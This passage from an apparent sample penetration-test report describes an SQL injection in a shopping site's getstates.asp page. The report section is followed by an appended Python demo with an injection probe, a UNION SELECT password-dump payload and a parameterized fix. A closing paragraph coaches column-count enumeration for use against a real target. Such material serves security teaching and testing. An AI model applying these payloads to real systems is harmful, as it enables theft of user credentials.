12.07.2015

APPLICATION PENETRATION TEST SUPER VEDA
Application Penetration Test for Super Veda - Sample Report

... pricings, or overwriting of the pricing of already existing products. Later on the attacker can purchase those very same products for a lower price. A detailed explanation of the attack is given in Appendix A.

5.1.5 getstates.asp

The getstates.asp page is accessed from the registerx.asp page. When a user signing up for the first time chooses a country that has states (e.g. United States), those states are loaded from the database and added to the registration form. The getstates.asp page takes a countryid parameter that indicates the country whose states are to be loaded, and an SQL query built from this countryid loads the list of states. Changing the id or appending a "'" to it results in an SQL error, which indicates that this page is probably vulnerable to SQL injection.

In the same way as the SQL injections described above, an attacker can use UNION SELECT to change the original SQL, which has the following form:

    SELECT FROM Countries WHERE countryID=223

to the following:

    SELECT FROM Countries WHERE countryID=223 UNION SELECT 1,password,1 FROM users

which, again, returns the password list from the users table. The UNION payload has to return the same number of columns as the original query (three here), with the password placed in the column the page renders. Note that the original SELECT probably carries an ORDER BY clause as well, which can be inferred from the fact that the returned list is sorted; the injected UNION therefore has to remain syntactically compatible with that trailing clause.

See the step-by-step reconstruction of the attack in Appendix A.

5.2 UNAUTHORIZED ACCESS TO ACCOUNTS

Severity: Critical

An attacker can access the accounts of all individual users without prior knowledge of their passwords, thus bypassing the application's authentication.

The login.asp page asks for the user's username and password. From those two parameters the application builds an SQL query similar to this one:

Imperva                                                           Page 20 of 73
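The getstates.asp finding above, reproduced as an added example that is not part of the original report: the quote-append error probe, the three-column UNION SELECT that pulls passwords out of the users table, and the parameterized form of the same query that defeats it. SQLite stands in for the application's real database, the Countries/users table layout and the sample rows are constructed here so that the report's "UNION SELECT 1,password,1" payload lines up with the original query, and the function names are ours.

```python
"""Added example (not from the report): model of the getstates.asp injection.

Assumptions: SQLite stands in for the real database, the schema is invented so
that a three-column UNION is union-compatible, and all rows are constructed.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Create an in-memory database holding constructed sample data."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    # Three columns, so "UNION SELECT 1,password,1" matches the column count.
    cur.execute(
        "CREATE TABLE Countries (stateID INTEGER, stateName TEXT, countryID INTEGER)"
    )
    cur.executemany(
        "INSERT INTO Countries VALUES (?, ?, ?)",
        [(1, "Alabama", 223), (2, "Alaska", 223), (3, "Ontario", 38)],
    )
    cur.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    cur.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "s3cret"), (2, "bob", "hunter2")],
    )
    conn.commit()
    return conn


def get_states_vulnerable(conn: sqlite3.Connection, countryid: str) -> list:
    """The pattern the report describes: the countryid parameter is pasted
    straight into the SQL text, so the caller controls the query structure."""
    sql = (
        "SELECT stateID, stateName, countryID FROM Countries "
        f"WHERE countryID={countryid}"
    )
    return conn.execute(sql).fetchall()


def probe_for_injection(conn: sqlite3.Connection, countryid: str) -> bool:
    """The report's first check: append a single quote and watch for a database
    error. An error (rather than an empty result) shows the input reaches the
    SQL parser unescaped."""
    try:
        get_states_vulnerable(conn, countryid + "'")
        return False
    except sqlite3.OperationalError:
        return True


def dump_passwords_via_union(conn: sqlite3.Connection, countryid: str = "223") -> list:
    """The report's payload: a UNION SELECT with the same column count as the
    original query, placing the password where the state name is rendered."""
    payload = f"{countryid} UNION SELECT 1,password,1 FROM users"
    rows = get_states_vulnerable(conn, payload)
    # Injected rows carry the literal 1 in the countryID position; legitimate
    # rows carry the requested country id, so the two are easy to tell apart.
    return [name for (_, name, cid) in rows if cid == 1]


def get_states_safe(conn: sqlite3.Connection, countryid: str) -> list:
    """Hardened form: enforce the type the parameter is supposed to have and
    bind it as a query parameter, so input can never alter the SQL structure."""
    if not countryid.isdigit():
        raise ValueError("countryid must be a positive integer")
    sql = "SELECT stateID, stateName, countryID FROM Countries WHERE countryID=?"
    return conn.execute(sql, (int(countryid),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("probe errors out:", probe_for_injection(db, "223"))
    print("leaked via UNION:", dump_passwords_via_union(db))
    print("safe lookup:", get_states_safe(db, "223"))
```

The important detail for reproducing this against a real target is the column count: a UNION whose SELECT list has a different width than the original query fails with its own error, so the attacker increments the number of dummy columns until the error disappears, then moves the interesting column into whichever position the page displays.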
